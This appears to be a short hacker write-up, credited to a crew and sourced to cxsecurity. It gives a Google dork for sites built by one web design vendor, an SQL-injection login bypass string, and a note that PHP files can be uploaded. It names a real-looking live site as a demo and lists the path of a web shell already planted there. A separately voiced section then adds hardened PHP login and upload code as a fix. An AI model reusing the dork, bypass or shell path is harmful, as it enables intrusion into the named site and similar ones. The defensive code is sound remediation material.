Hi bro, this article only covers an admin bypass dork. Just for the memories, memories of her with him :V
Dork: "Design by Yuvantra pvt ltd"
Proof of Concept:
- Dork in the Google search engine
- Dork: "Design by Yuvantra pvt ltd"
- Admin login at /login.php
Example: http://localhost:8080/login.php
- Log in with user and password
user: '=' 'or'
password: '=' 'or'
- Demo:
http://www.yuvantra.com/login.php
- Files with .php and .phtml extensions can be uploaded
- Shell uploaded
http://www.yuvantra.com/uploads/students/zaen_umi.php
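Seen from the maintainer's side, the two weaknesses in the steps above (a login that accepts '=' 'or' and an upload that accepts .php/.phtml) are closed by a bound-parameter login query and an upload allowlist. The PHP below is an added example, not code from the affected application; the admins table, its columns, the allowed file types and the function names are assumptions.

```php
<?php
// Added example: hypothetical hardened handlers. Table, column and
// function names are assumptions, not taken from the affected application.
declare(strict_types=1);

function check_login(PDO $db, string $user, string $password): bool
{
    // The username is sent as a bound parameter, so input such as '=' 'or'
    // is compared as a literal string and never becomes part of the SQL text.
    $stmt = $db->prepare('SELECT password_hash FROM admins WHERE username = ?');
    $stmt->execute([$user]);
    $hash = $stmt->fetchColumn();          // false when no such user exists
    // The password is never placed in the query; it is checked against a hash.
    return is_string($hash) && password_verify($password, $hash);
}

function store_upload(array $file, string $destDir): string
{
    // Allowlist of extension => expected content type (assumed business need).
    $allowed = ['jpg' => 'image/jpeg', 'png' => 'image/png', 'pdf' => 'application/pdf'];

    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed');
    }
    // Only the final extension counts; .php and .phtml are not in the list.
    $ext  = strtolower(pathinfo((string) $file['name'], PATHINFO_EXTENSION));
    // Content type is detected from the file bytes, not from the client header.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!isset($allowed[$ext]) || $allowed[$ext] !== $mime) {
        throw new RuntimeException('file type not allowed');
    }
    // Server-generated name: the client never chooses the stored file name.
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($file['tmp_name'], rtrim($destDir, '/') . '/' . $name)) {
        throw new RuntimeException('could not store upload');
    }
    return $name;
}
```

Keeping the upload directory outside the web root, or configuring the web server not to execute scripts in it, adds a second layer if the allowlist is ever bypassed.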
Thanks to: Purworejo 6etar and Baku Hantam Crew
Source link: https://cxsecurity.com/issue/WLB-2019090057
That's all for this dork write-up, thank you.